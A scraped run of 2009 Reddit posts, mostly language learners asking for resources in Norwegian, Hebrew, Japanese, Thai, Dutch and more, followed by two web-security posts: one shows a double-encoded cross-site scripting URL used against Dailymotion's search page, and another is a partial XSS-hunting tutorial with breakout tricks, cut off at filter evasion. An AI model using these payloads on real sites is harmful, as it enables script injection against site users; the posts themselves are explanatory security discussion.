| r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxeDcwdWM1RTFyQldRdHNybEVfbGRLSzk1WkhwcWl4dWRFU2pwZ2x5bjh2N2RTS1g3UEtNQnpNVlJyMm5fVXZnSmliV1JKQVlFWWRCNWZLNVZFYkdjeEE9PQ== | Z0FBQUFBQm5LN1ZoVjdVb2dXZ215QUg0OHVsLVR3SlBYdllnWjVpcWZfZkRGOGpUZTZSM0JkQnBmM0RVTnkta2lVT0FndEVsa1lDSFN4MWxYejFHSkR4ZzQxM3AzR2lmeVJydGVoOFZRU0wyZ3R1NmtwTjdlSndhZDVFdVpTQ2tfbWdTdDk5ZVQ2REZkdHlKRXJtN09mNUJQY0luR1B2TVdORDVMLUViTUs5OUgwTm5fOEJOaHltckxSLW9YYVZXQ3AwXzhhamV3QmxoT3JBWFM4MmdqUlFaQzFIRGs2Q0VLdz09 |
I'm a native Norwegian speaker. I'm good at phrasing and my vocabulary is very decent, a Norwegian grammar nazi in many ways. I also speak English at a close to native level and can help you out with anything related to the language, be it grammar, pronunciation or sentence structure. Will do my best to help you out before you leave for Svalbard. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1Vxc2xSOWxIeGY1MkFqNzhsNVBFNHltZkFxZWpUV0NtODRRSWgxRUVKcEM1RGpTN0RDMGNPYUh5QUdzbTJsb05rdmJUUmUwRm9hTzBwSVJVSEZ2NVNJanc9PQ== | Z0FBQUFBQm5LN1ZobnZTSHBvWW1PVmc4Rl9yS3NyYkZjVFZVR0NzRzEyNE1MYkhncGx3dnhuTExQWmRwTVlpanBWNHI0VUgwclRCTDRvdnROWjFTUTVNZmZfWTBPRjNFdVVPdElRSi1EOTlNWE1iWnlFRDFGb1RDU3lacnlWSzdCbGZUbGRHWlUxNnI0blptY1c0VkZPR3VzWC02VDJSa3oxN3hwR05OVzl2cHZUNkRfU0k0dDdJPQ== |
Born in Tijuana in the 70s, back then there was no such thing as 'watch TV in Spanish', all we got was local San Diego stations and a couple in Spanish, but with shitty programming, so I naturally stuck with the San Diego channels.
By all means fire away, I may not be the Grammar Master, but I will get you through that 'why do people in Tijuana say compa as opposed to cuate and how does that translate in English?' sort of questions. I'll do my best to answer in the evening once enough questions (if any) go through.
I would like to say that I know 4 languages, but my French is really bad, I can read it, but can't pronounce it.
My Japanese is good enough to know what they are talking about, I lost practice with writing. So I'm here to learn more than to what I got to offer. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxNHZUcW5EWDZCZzZnUFo5SXlYcjdqdnNJaXlJWjRubGdoaXcxeHh3OVI3Yl9WcENTV0NldzFfU0VMOXNYMjMweGE3WGQ4UjZMTkVkZ0twbHRlWThqYmc9PQ== | Z0FBQUFBQm5LN1ZoT3dhOXREWlFQV1dUNUV4SmF5dXlPYVRCUEFXQTMwUy12aXA3VkNvSGZZVE1EZkUzd2VIOTFpYXJLdERSUXlfSkh5ZWlsU0lmUzBEMEdXeDhIOW1KUVM4Ykh1WTFmSHRUUUNzTm5sMHl1bDlzSGlhUzBDODg0UTlFZEZkV3hMVWhST25LNlZNNmVtT2FXQVBOVFd3TEZkTVJ6d29uQVpnLWV2NkMyMEVNZzBFVzR6UmU2UE96TUprTUFTMmxuVnVCem15UnotVDFValZpX2xiakxudmlVdz09 |
I've got some minimal vocabulary right now, and no grammar whatsoever. If anyone can recommend me any books / sites / games, please do so.
I'm open to learning books too, but most of the times, what's in the language books isn't necessarily how the language is really spoken everyday. So I'd rather go for the games / videos / forums. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxQ1FEN2JxZG1DMWVVSDBjUUZPQzZzdGlmMG53S0lhLVJjVUNLMUNXU0pWdHplc1NlM3R2TnhqSWYzbWtGd21CX0NiRm9hNEVkcDE2NVM5T2VDeXRzbVE9PQ== | Z0FBQUFBQm5LN1ZoanZLM1pUMFlDeUhSbUtqWmRFV1pPSUNLRzJMUHhCLUVXOWR0S0E0Q1ZSSUxqTjRHLUZYVi1IcHJLbGVYZFA0UVNhRVRnMURjOXlOWXh6VGZkSU5Vcl9XbThkd1ZIT1lGZlAtQl9wVmVsYkk1NWdZM2xackdoY0JEWVBDZUxidUZzQXpxY0tBbFltbkVHMkhraktCZXBZVVJYN21KZjlRYlJXMmFESFJGV3dpOW94Mlp2cXljN3cwVFNOU3NMLUhM |
They tun pretty cheap. Just a thought. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxdXlxaWNvbGRPWDBwMGdzTmUwZExsczliRDFUTjlOZWZYS0IyVVYwWnhxWkc3SXZJQm8zSlprTWtzYndYWHE3dkNXWVgwRUYwVmUyTDg5OWsyWlFxbHc9PQ== | Z0FBQUFBQm5LN1ZocU90ZWxLZ3dCZzV6UG5rb3Y0MkF2ZElDM2tVa3AyaG5QaGIwVlF4bjhGR3NnVmk5YklxenF6ZGFvc2RjNDBqOFZXSm1KZ1AySkZ0UmVJOHFBUDh5Vml1eERNZG1FOEQ5Z0VtNVFnZ1hSWHpEZXNUQ1hmWjg2dGN0ZkNuU1VnaExsZTllSzZpVTV5VVpHT3FMTUJsMDhDN3JBbWM4VG5tb08wWVR1bVFhOWJJWlY4enF6dE1ReUNoVTdaRmNzLTVHbGNVT1N6anlkVlRLdklLRklaMzFYZz09 |
Check [this out](http://french.about.com/od/tests/French_Tests.htm)
These are really good tests to brush up on what you know and also to learn. This subreddit is awesome! | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxV3BOcXlJRTBKZUJfek5EUG11cUxtRFNyQWJJSkE0QmowVGN0b2FUOXFuaDlJTS1zQTlabkpMcXNvQ2laalJZUEJHZTVJTThfX3lkcGd1bEVqS2d5M1E9PQ== | Z0FBQUFBQm5LN1ZoajNxeWhTcFR1c3lJck15TFFocWJTcjByakJCMklpWFdIS1NzVlI3Znp0TWtMdTNBWWRIdHgtOWMtekVGNXp6Qnh5Q0RHdkhvcUV0SkltMkFXOVRwVjFDYVlQVjVFWFdYUC05cGE4VDdja0tSaVBHc1o5b0ZuZnNyVFYyU2dqRG5YQVA4blIzcmV5X3hoVVg1THI5QlRYWDZfRE5Ebmx1aXI5WDdLTXJkTzlQbzZWSEFKeVg2V21mZGVpeUZ4MVRrRkcxX2doYWUwclk3TURLXzlVTjVqUT09 |
Any resources or help would be appreciated. Thanks :) | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxWU5WNnZ6MjdJNHA5c1FMY19Qa192c1pNWERZbnZTOVVGazVBcXl3VkNmQTNRSTFQaWVCRXNHV0FPc1VCMjJhcEFwM3dnMFV3aW5fWVZjc1BmcGxSbUE9PQ== | Z0FBQUFBQm5LN1ZoN2ZBSTVmZFRFa3I2ekplMExmWUFJbEczNXlCeEs0Rl9IQXlMRzBXQzVyczVjWEZ5bW05R0xZeG9nM1JUNVpOaUZJX0oxY041Ulo5endqeDkzVHJDUUlzN2xwZi1GOHEyOHhsSWtrUjQzY0xNQU1oQTZ3Q3ZadWVVaU9IZ2RvYnlDT0lZRFRnM184NnRKdjFReFFXNld0WUtneW9GazRVMmh6R29WdUtteXFqTWlMMzFKYTRTcE8yU0F1a3c4c3R6 |
שלום לכול! :D
אני לומד עברית באוניברסיטה מקגיל בקנדה. אני מאוד אוהב לדבר עברית אבל אין הרבה הזדמנויות להשתמש בעברית שלי באינטרנט. אז אם יש עוד אנשים ברדיט שלומדים או שמדברים עברית, בואו נדבר כאן! :)
Hey guys, I'm taking Hebrew in college and really enjoy it. I'm not looking for a learning site or anything, I just want to chill and speak a little Hebrew with other people on reddit. :) Post if you're interested. Write anything, אבל בעברית! | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxNUJ3TXpFaFR0aXo2RFNqVkl4b2RqZUNpX3lBd251N3VCUE9jblVOamtFVGdzbkVBUjhLVnRIdk12dE10SUEwMElycEx3UDJqMm1rdVZnOEhnVnlOeEE9PQ== | Z0FBQUFBQm5LN1ZoZzR0MV9IV0NDNXJLMXROcGxEMXl2d3Z0NEI5RjNwczBPU3BpdEZwV3VTY2FJOWNFWHJudWw0cjM3S1VVWmUxc3NTa010d2hQUEY1NHlhMXgzbEFGWFlEdGZ1dGs3VnVybEhiMmpoVmlpN0FmMk11czVrMUctM2Uzajl2V1hTRUR1U1dmWFpOc3ZveWtYdGUzaWNtSlBHRmxBTG1NQkdaOTkzM0VxU0MxNTdnY2ptSnFIS0M5eWxoZXVsbEk3VHFL |
[Foreign language internet TV](http://multilingualbooks.com/online-tv.html)
[Foreign language internet radio](http://multilingualbooks.com/online-radio.html)
[Other resources on the site's "learning content" page](http://www.multilingualbooks.com/mbcontent.html)
I notice that, unfortunately, about a third of the links don't work. I don't know that they're broken, my guess would be geographical viewing restrictions akin to BBC streaming video.
Nevertheless, many of them work just fine. Many languages from which to choose. I have some other resources which I'll post in the future.
Even though watching TV and listening to the radio might not really be "immersion", I find that watching and listening helps. Captioned foreign moves also help. It gives you a better feel for the diction and vocal mannerisms that people actually use when they speak the language as a native. Especially when you get to the intermediate stage, where you can understand much of what is being said.
Also, TV, talk and music help you get a feel for the culture of the regions where the language is spoken.
I hope some of you find this useful.
edit(fixed the missing TV part. oops.) | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxVE4tZlIxQ2F1RWdKU2VxVzMyYVNVQ1poZXo1WlRZdUh4V01aVHV2SEp3eWtYd3Z1UVBkQkRtWUpsejFTTkoyU2NONGh3dWdMby0xWHBlOTBZVWFGRWc9PQ== | Z0FBQUFBQm5LN1ZoLVdzNG5CLXBsNWEzMWYwbEFiU2pVSXdGc1k1SVZ5clozV2tGQjZiSXM3WEltX2FYV3JLQkRRWS1jV01VRTM0bjczVGk1dWdTM0x3WW9Fa3ByTnFadFlfcUZhS0FmZ0ZJbUJIb0xIZnJJMUY2Ym52TkJlSXMtazhjQ0wxSkl3RDFQY2ItM0NiU2RRRU9XRFZYSGRXSUUtSk81ellyaWNSVV84QW1NOTB2empxVERPNHZKWnZ4V2MxazRNanFPWTc0Tm11QUl1RDN1LWlFUkhQRjhnT044Zz09 |
Really, cussing is the UNIVERSAL LANGUAGE. Lets make this thread into a cornucopia of multilingual profanity! | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-23 | Z0FBQUFBQm5LN1VxcUotZ1V5WXRrcVU3ejVIazdBclgxLXV6V1FqOXpYY1lMOXNaM1hwYi1EUXVkNklIQkswMzlOM3dwYlJiaDRRb1hzZTBvZzJoTVdlVHZQNmNKQlJJeGc9PQ== | Z0FBQUFBQm5LN1ZoVVJtLUdTTDB4XzRKR1RqVGE4T1R6Wk02RUlESmNuSEhWVkFlWERhUl9od2xJbVVmN3FjMW0wVDBNVlFtUm43dDJpdzJEWjVOR3dPT0xBVHl3WEdadVo4c1VnUVNYVG1WdEVrZ204WlNycTZ4M044ZHZtNXY2VXZlZTFwaGYwa0xHc0xhQnVyWTdvME5KRG5Bck5kUk9tdGp3Tl9QTHRCRDdmaERrMlZhbUVSTHJzWmpvOU9lTnh1SjhiVUM0OXBG |
Hi, I've decided to take the AP Japanese test this year, witch is about equavilent to level two JLPT, I think. I need to learn about 420 kanji, and my current flashcard method is slow, despite being effective. I was curious if anyone had any better, or different tactics for memorizing kanji.
I also need to learn sentence structure and further vocab/verb conjugations. Any help would be greatly appreciated.
Doomo arigatoo gozaimasu, redetu-chan. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-24 | Z0FBQUFBQm5LN1VxcXpGSFdvbWc2RFgwRjdrV3RJTGJmMlFwM21RZDRnR1o3NXE1TE9GNGtDRWJ1NDREZjRfTlFLeXlsVEFSWm9KVVY3VWhVSWFlOXZpWldONmlKV2JzN1E9PQ== | Z0FBQUFBQm5LN1ZoYnllWGMxempjcno1ZjdmaHlqUDhMa2R1VFpWQ296VDFYYzlReEFpMFZKLVZfM0ZPbnV3cFdhQkYzMldncUNnYkdnMExFZUFOYTRHR3RtMTNwcEZoWGtVUGJXOHJEem5VbkpxcjliRVVwVDhDOHE1cFlXNlFCUkxkeVZJdGtXNHZQSHc1UGU2a0IzTFNtLVBwVWt6bGNab240Qy1TWGVTcFE3UjRlVjRRLU1SeVZLTldmQTN0ZFI2M1JNMWdCLVhzbW91OHA2SGU5RUpUY1BLQVhkSXliUT09 |
Does anyone have any resources for learning Persian? | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-24 | Z0FBQUFBQm5LN1VxWFhrenZmQnlVQjk4YW9RaFhpRkdER212RmdLRU9mUDdVX3FEYUlGclBia1BNU0ZwZ2F1ZXp6bENHdmZncW5rWGdUZ3NELTRrZUM5YnUyZmhWNndNd2c9PQ== | Z0FBQUFBQm5LN1ZoRWp4RTRkU25Bb2FoOGlXZmlwRVAxcGJnTUV1ZnBTRDdNWFJIRXlNZFZ1dWMwU0FZU3pTU1lsVkN3Z0lvNlRzSm81RU9xeXU0eVh3cW1EcmpMSm9icVRZaGVtV1JZMzVzOWdFcVE4UkpsVllJUnNtU0hHN2pVclUzMVkyRjlmR1dWSmhIamZSbmlYNWpjdm9nTUhsVUpWaHJhTjhtWmxhTDNJd3lNY0o3MTQ0PQ== |
I'm looking for modern popular fiction of any genre that's easy to read and that I'll hopefully enjoy for its own sake rather than just as a learning exercise. Preferably written by native authors rather than, say, the Spanish translation of Harry Potter.
If someone asked me for a similar suggestion in English, then depending on their taste I might hand them something like The Beach by Alex Garland - well written, good story, but fairly simple in terms of vocabulary, sentence structure and so on.
Thanks. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-24 | Z0FBQUFBQm5LN1VxQjlDUUV0Y3BlRWZmSFB1dUw2Qmh1VndTc3dndmZtX3FfU1lzSEQ0UVhDdzZHb1luM2ZUOHRMQTRsSDVyZUs5U0x5VkNBN1hncEF4MVRvTXVyeHk3Vmc9PQ== | Z0FBQUFBQm5LN1ZoSWU5M2NGSmVaOG1ydmItQW1OeXhNQ1cxYnpFX1Zfc05QQ1UtMTVqSFJDdmRDaGxvMkQ2aE1ael9lNVlwTDg0SVA5QktJd0ljVDk4cUp3cmJxMjhyVzRNUkxmY0M4LVpwdmY3dnhwTXprcVR1RXl2azdvelk5S0Y1VkFiVzBGZXJYbm9oSVE3ZXZTTGhEa3RsS2ZOaTVwaHlubWRNRGVmTGxvcGQ4UmFwVlRDVHRNcGFjRjF4amhxLUlIQ21rMkJtaGNvaU9EUFcxQ2VuYkZrZFJ5ODFudz09 |
I would love to learn some Thai.
I'm going to be visiting Thailand in a couple weeks and would love any tips, pointers, recommendations, etc.
I've done *some* background on the language and am aware of some of its difficulties - tonal, for instance. Other comments very welcome.
| r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-25 | Z0FBQUFBQm5LN1VxZWNmWjMyQXJRQUJ4Nl9HU2ZGb3YxU045WWx4eXYzM29VSlRWOUg1cGx5NW5xZ0hjRHozdVFFMmxMR3F6YVhhSlcxX3V6Y001dWNRUG1vY3ZhTmtoU3VvU1lRS1QxR01sV2xPa01zUTgySXc9 | Z0FBQUFBQm5LN1ZoYzFsZ1I1X3kxUGt6S0tQNlRKMEwxZTBJUU1zb00tRDRlQ08zMG1hYnhvcFpkc3NtMHNISjF2Y1dNVzdFdUppdzEtdVdsWlpYSVlWX2R2RGQ2ZFY4ZjlKWXRlVzctMkJMMVlRLVNJbUFyWDlkZGdIU0p0VVBGeHl5TUpsb3VpSmczbzVYSnNwWTlUdjFtUExHdUFjTnBRPT0= |
Well, this isn't exactly learning the language, but as I'm a former native American, but since I moved from Boston to Belgium when I was six, I lost my awesome accent *sigh* Is there another way besides watching American TV-shows to learn the accent to get back to my roots? | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-25 | Z0FBQUFBQm5LN1VxS0poSDBfMlJ1VEpyRUo5aUsycnR6bnBnanJwUWo1bXBTUFF1bU9OMFZ3NUlNbHd0UWZsNHhkbGRNNnpqRUJRWTUxX0N4SFl4SDhPdzIwaXgycUZsWGc9PQ== | Z0FBQUFBQm5LN1Zodzg4dm92WWRvYXBfZ2o2VXJJUWE2Y1FWMjMxUG5icHJpVVA1SW9KSlVxZzA3dloyQ0hWd21ZOERzQ3JEUGV1MTYtRjM4V1Z1S19MUzRCdnA0WGhKS3IySUFQeWJGMWxuYW4xQmZ4RUY3dno0S3U1bS01MVRpNGZuMU1ENURMN0tSRWRvRi16VVZ1QmNqc1pwajF3TEl5c2oyNU50VjlPOUQ0NDEtcFFBa0pRPQ== |
I sometimes come across Kanji which I find hard to keep separate, eg:
乗: ~power
東: east
大: big
天: heaven
末: top end
Does anyone know a more comprehensive list of those kind of similar Kanji or maybe some ideas how to better distinguish them? | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-25 | Z0FBQUFBQm5LN1VxWF9Qd1l5S2p2SWJhVjE0SWZHRk1hbUJwNEN2SHlzaFl4SV8tMmJ0V215OXRpalpEVl9XZVRlQjYtQTN6Y211aDZlUXdvMWRRYjRHNkxXSE82RFQzWUE9PQ== | Z0FBQUFBQm5LN1ZodHUwTFQzelllSm1sRVlvRFB6cHJIVGM2cmRjdnZoTFRkNzNkMm9jcXRpRTFTeTJkMnlVX1BSVkowVVU3N21TVGpsYVZWVWZ4VkEzNF83ZnotVU5NQ0RtTlhya2ZXQ3NXbDJYMzNvNk9wMmkza2JLSkNoNHdSdWRYenVZRGZhTk5MY3NPNEQ1TUpDVkRnR2p2WXhHQ2MyWk9yQlVwVEhZM2pNRWRtV2J2U0hCUG96WGU1TGIyYkFRcmxRWjMySnpTc0NMX19jX24yU0pZMlBEQWVOaVJqZz09 |
I personally use [Word Reference](http://www.wordreference.com). It supports a lot of different languages, the dictionaries are pretty complete and the forums are well referenced and usually useful (although I never tried posting). You can even add it to the firefox search bar :)
Only downside is the site does look a bit old-school... | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-27 | Z0FBQUFBQm5LN1Vxd0xCN3d2ZkdzNGEwdElYQnNiTnpvODk0eDlLRkFUenNOajdEZGc3Nzk5cTFmMy1yMkRIbDRQdlNxMlpaTlE1WEU4b0tzcmtXRkZvOFlyX1dsTzNGb2c9PQ== | Z0FBQUFBQm5LN1Zock1jODJ3ZDRnR2o2eXZ1UFV5V0FOX0hoUmRidDF1VEU4X3d4ZEtfd3k3MjZNSG5zNTI1LVBaOW01N3VYSmxLc3hHZzVRRE50a1g2TmdpLUhwUHF6Nkt5SVdwVm9jWERJSGZBdlpHb2FxVEcwNlRfZTZKOVpDS21MN24xR3JZR1h2Zm45eTVxN1BTaEZYQmZ0eVQ1ZG5UNDNwZ1BkdGFTMnRjRFVaVlo5RUZnQlA1QklTT2pJbHJWVzhSY3NtZnF0LW5JY2JNdEFKVWwxRXVINWw2VzNsUT09 |
Well, I'm not an admin or anything, but doesn't this reddit deserve a logo? I'll kick off with my own submission in a jiffy :)
| r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-27 | Z0FBQUFBQm5LN1VxN2pUYWs1MFNncjZoa3ctRndlRHRKY25KVHplX2RrM09QeG5XX3hwX3BGbnF2WWZmUl84NXVUeS1nWTlLZ0g1cjktSHRocnpES1NoUE53bU9VQVpPaGc9PQ== | Z0FBQUFBQm5LN1ZoTDN0X0FLUmFabTBYejBpM1hIWU5PcXlqQjRZSEE4a05jRmVyU0ZSTEEyS1B4cVg2UUFzeW5TMVkxUmx2RGZrbDN6Ty0zNGtqYk9KUU9GLWpxYWNMTHNfXzNRZGo5RjBXOVdSZTZzQ2pmNUtpVUtHb1pkUW52cFQ2VkxocHhjekU1NXJMZmRSdlJzNTBNeTJXMExsbDJCZmJDVVpudjBDT2dzMWFkeHpxelhKa2MyQ1FmT1RjUVpnRzNzcGpCYjZu |
Just wondering what software people here recommend for studying Chinese characters the Heisig way (eg instead of drawing flash cards). I am using OS X and Linux (if the OS does matter). | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-11-30 | Z0FBQUFBQm5LN1Vxa09tSHZqaXhpcVpPR0FSQ3U5cmxTXzJ6YmpYTkg0LTZCWms3ZUxyQTJlU2xJNHl6SnhJOS1iNzRXTWhteTQ5VWJwQ1VzTlo5am5URjZUTGZxR2FFVmc9PQ== | Z0FBQUFBQm5LN1ZoeURYQWhqNmFOYTZkdVZCdV9DUUVxU1duVHYzS3RZMXFJZWNvWTJhOUpTRXBUWS1WVHdvbzhYczJlUzk2a2J0YWRBTnJ1NUQ5YkpVSWZ0QkxEUFE3czM5Tm1vb0dQWWpBM3hudlYxendSdE1tQ1NXS3FGaTVKQkdyRVNOcVltSFd6TDh1clYwRFU5bmRwOWVHVk5VREd3NndlM3hjclVUY2U0WWo3UW12a2oxbVNka0s0TUpFOEN5UVFiLUFvZVJiczNpcWhybW9CSmFUaTJiYjZqb29KUT09 |
I'd like to learn the basics of Mandarin, but most of the online resources I've found are not particularly organized or informative. Does anyone know of any helpful places to learn basic pronunciation and writing skills? | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-12-03 | Z0FBQUFBQm5LN1VxM3NTQVh5aGQybTAwaG56Y0ZMSEpNVHNFYlRHTWZlMXZmcnE2eUVHdVFDcUl3ZTVGVTJNWkpyQ3cxXzhjYkQwWF9kU01YZmxYejliYlZvVTNnanY0MHc9PQ== | Z0FBQUFBQm5LN1ZoVUYxbjQtZFZEVUNYaE5yVXNSM1d5TzJtT2lzOEZrX3MtZFBSVVRBY0ZfSXVZSGRTUC1fZkhBN2Z3eFMtSVQ2MndoZXJGRHFiaVRLWGNUSElOWFM0Z25TaUtXYTVlR0Q3ZHcyN3dmMXJTWHd3dHB6RFI5N3U3Q2d5V1paMWpqSnltVGVDOUdrZUVsamhFMlNNX1JWUFFtY29DMHJ1QU50N3VocXZxdmpUZUdlY2VxanR6VVdvY2FHZEJ2ZExMdWIwcmxKUUpQMzNVTVVtYWVFR2FrZ19LZz09 |
Does anyone here speak some Bengali or have some particularly helpful sources for learning (I'm not opposed to spending a little money)?
Does anyone have a good language to compare the difficulty level to (assuming learning the alphabet isn't much of a problem for me)?
If how far of a stretch from Bengali is Hindi? Are there any similarities?
If anyone knowledgeable in this wants some help with languages, I'm good with French and have a lot of resources for that along with a lot of tips for remembering certain grammar, etc., and while I'm not fluent yet with Japanese or Arabic, I have some resources for that too, plus a handful of tips. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-12-06 | Z0FBQUFBQm5LN1VxeFQyWHM4Rm5adjN6dXp2OVlNU1VtcENuRWc3RUxXN1V6WS0wRkxjbTdMVjludVQtV3Z5MDBUcTZnTUN5NzJjbEF3a3IwMW5nTVdULUQ0dE9JQ2ZERXc9PQ== | Z0FBQUFBQm5LN1ZoRUJTVFZPWFVYQzlfRGlrVjJ5SUJWalZTTDhRZ05LU3NIM2FFcUFYV2R0NGV2cHFFNVlvdnhCai1jWTRLeVBGb1pGXzlPYVBKeS1LdEhQZThTUzFmSC11WnNXNHZ1YlN5M0kyTUc0NzMyZGVNbFljZFVKSGt1YmJtRWZ5Y3dockNhRFpjRm1ZQTNrUWhvdmotSjhUbEZxV2IwYkZ6bUJKaExDMUhNT3VwYWZzPQ== |
I recently (as in 4-5 months ago) started studying Dutch. It will be my 3th language. (I'm excluding my first language - bulgarian - because I never really studied it, I never had any classes or anything similar. I know it only because it's the language I communicate with at home) I haven't made much progress however because I have been busy with my college studies.
My problem is that I am not sure how to approach it.
I was forced to learn both French and English at very early age: English at 4-5, French at 6-7. I immigrated here when I was 5, and went to an english school, so I was obligated to learn it. I didn't have the choice. I was under constant exposure to the language, so it wasn't hard at all.
I'm aware that everybody has their different ways of learning new languages, but can someone give me tips? I'm stuck on the getting started part. I just want to learn dutch well enough so that I can have conversations. After that, everything will be easy, since I will be able to expose myself a lot more to the language. | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-12-06 | Z0FBQUFBQm5LN1VxVXE0SUNvVWMtRmRwSUlteE9JYWtxN2o3TlhHUU5KMWhmOTNDak5FQUZidHFHbmhuTDRaYXlJSUh1NTc0bHJCdDVzakhlNGFLRWFXQzMyQzJPaUVlQUE9PQ== | Z0FBQUFBQm5LN1ZoNFJOSXljd014X1NhVjFOZzNTUlVqQ1hpRmQyQm52VWljZEpWdW5uMkZPblZiV2NWTEEwY2tfMGtHeVZFNkV0R2pDcXhfVE5oNjd5RHNBUGI4V1pkVzUzR09WVGtjTDgzeEdPWVVFS2FzOTBkeG82TkZoeGZTTHFka2psRDZsTkdTd3ZaY3ItaVpjOWc3RFlsT25NWGhGZkhtaXF6RUdCZlVtS09EVGxVdUNrPQ== |
I have been teaching myself Hebrew, and I am very confused by something. I was always under the impression that "ani" meant "I" and "sheli" meant "my", but I often hear it used as I. Could someone help me with the distinction, if there is one? | r/learnanewlanguage | post | r/LearnANewLanguage | 2009-12-14 | Z0FBQUFBQm5LN1VxemtqUFZUdXRMSERhRWRuaENVSl9pNWJUeFlKemc5VUt0d0ZEb0J2ZldCQllIdXVCVFkzZHZ5ZHFXUjViWHlCaHIxUnlIY1pCTG41Qk1UVjZJdm9kRXc9PQ== | Z0FBQUFBQm5LN1ZoWFlDVmdjS3RmYVBPVnVzaWFodzRZRFhTN3p6WXY0dkd6WThmVGdKRGNSdTJKZ1lrLXN0akwySFFuX1pSQ1l5Rkh3LTRaTXplaG1DSmJYWmVsYmJiS1c5NmctaE1kcW1PWDIzcFZya0VNaTdnWmRqU1JaN1FsblhHMG9tMm1PQm9USVJQQ1JSLXA1anAxUEt4bDVGZlpoZlgxNEFISy1xMEZPMk5CTjZBMU1iaUZXSXh4RlFUMkRGdm5FRV9RTUxhVW02Y3h6WUlZdFo2MG0zNXNnYW95dz09 |
[My original xss exploit](http://www.dailymotion.com/relevance/search/%253C%252F%2574%2569%2574%256C%2565%253E%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2527%2578%2573%2573%2527%2529%253B%253C%252F%2573%2563%2572%2569%2570%2574%253E%253C%2569%256D%2567%2520%2573%2572%2563%253D%2522%2568%2574%2574%2570%253A%252F%252F%2569%2573%252E%2567%2564%252F%2535%256D%2568%2553%2579%2522%252F%253E%253C%2574%2569%2574%256C%2565%253E) was their search url with my script as the query, here it is:
The script on the end of the URL is actually hex encoded twice because, I'm not sure why or if this is even it but, they seem to be removing non-html encoding hex codes on the back end, so encoding the hex encoded trick *did* the trick before. Any way, the script in the url decodes to:
http://www.dailymotion.com/relevance/search/</title><script>alert('xss');</script><img src="http://is.gd/5mhSy"/><title>
I used is.gd as my image source because I had limited characters. Anyway, I was escaping the title text to insert my script. So to fix the exploit, instead of just running the input through html entities before placing it in the title, they just decided to remove the title altogether from the no results page. So now the title section is just <title></title>. Made me laugh. | r/websec | post | r/websec | 2009-12-15 | Z0FBQUFBQm5LN1VxSG0tNVRnUml3T21SOVVEbGU0VEhBR0dLMFFtQ19HdEx3ZWlSS0F2cXdkWEQ2RElFM2tJeHhjRHNwcnkya3NUYmN4LWsyNVRkZDMtYmp0ZU5lNjFDM0E9PQ== | Z0FBQUFBQm5LN1ZoX29ESUtqNTk0VmN3R250cmdnY3pLLUVwVHBRX0lCOTJrMGp0bWtVYzRPdjhYajhzaTlsTkVMNnJRTUdCbXRLLTdsRU1MWmVUX0xZeHU4OU8yVzYxUW9oWEw2NGdXYktDSEk1aTRfMkQxS2pzYmdxSk5MQkV3RFZWUnhWMUViUGFyclhjTTJBeUYwcE9KSktHWjFVN3h3U0ktcWlWSFVYY3cwTHVwY3VLUk91R1NUT2NrNFRqWmVhSTFRczdDUDhT |
First of all, we have what I would say is the most important string of them all, this will be your mighty sword for finding XSS exploits:
This string has every character a well protected site **should** be filtering. To test a site with it, enter it into some kind of site and then see what the output is by seeing if the '<XSS>' part of the string shows up in the source code as '<XSS>' instead of something like '%3CXSS%3E' (this is filtered and is not exploitable).
Hopefully, if you find a site that is vulnerable (does have '<XSS>' in the source), this string may break something on the page as well. Always view the source to find these breaks, as they won't always be visible on the page itself. Here are some examples of common breaks and how you can exploit them:
<input maxlength="2048" name="query" size="60" title="Search" type="text" value="'';!--"**;<XSS>=&{()}**">
Here the double quote escaped the value in the input form and placed our query onto the page. Now, to exploit this we can simply start our query with ">, and the page will be open to exploits.
<script type="text/javascript">
var userInput = ''';!--"<XSS>=&{()}';
Now this one does not look exploitable at first, as it doesn't break out, but it is if they don't place backslashes in front of your quote marks. It also wont test as vulnerable if you just try a query like:
This is because javascript recognizes which quotes are the ending quotes and which aren't. To achieve the result we want, our query will need to start with this:
This was, the original javascript is over ridden and when we open a new script tag we are able to insert what ever we want.
<title>Search results for vulnerablesite.com | '';!--"<XSS>=&{()}</title>
Again, this query won't break out, but if the source says '<XSS>' in it, it is vulnerable. What we do is start our query with this:
By closing the title tag, we have escaped the title which cannot execute scripts inside, even if the script tag is supplied.
**False positives:**
Sometimes when I'm searching for '<XSS>' in a site I've tested, I get excited when I find it, but am then disappointed when I see something like this:
<script type="text/javascript">
var userInput = '\'\';!--"<XSS>=&{()}';
<script type="text/javascript">
var userInput = "'';!--"<XSS>=&{()}";
Both of these are false positives because, although they contain the <XSS> tag, they supply no method of escaping the quotations wrapping the expression.
**Filter evasion**
Sometimes, a website will attempt to protect against XSS exploits, but will do a poor job at it. The ideal method to protecting correctly sanitizing the user's input when being output back onto the page by using something like [PHP's htmlentities function](http://php.net/manual/en/function.htmlentities.php). Inexperienced coders will do a combination of three faulty methods. They will do:
